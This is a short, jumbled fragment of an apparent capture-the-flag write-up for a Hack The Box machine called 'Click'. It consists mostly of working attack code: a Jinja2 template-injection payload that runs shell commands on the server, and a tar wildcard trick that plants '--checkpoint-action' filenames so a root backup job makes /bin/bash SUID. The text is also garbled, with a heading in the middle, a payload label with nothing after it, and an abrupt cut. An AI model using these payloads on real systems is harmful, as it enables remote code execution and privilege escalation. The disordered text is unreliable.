{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }} Response shows uid=1000(click) ... – command execution achieved. Payload (URL-encoded):
Wait for cron (or run backup manually if possible), then: click htb writeup
echo "#!/bin/bash" > shell.sh echo "chmod u+s /bin/bash" >> shell.sh touch -- "--checkpoint=1" touch -- "--checkpoint-action=exec=sh shell.sh" When the backup runs (likely via cron as root), tar executes shell.sh , giving /bin/bash SUID. {{ self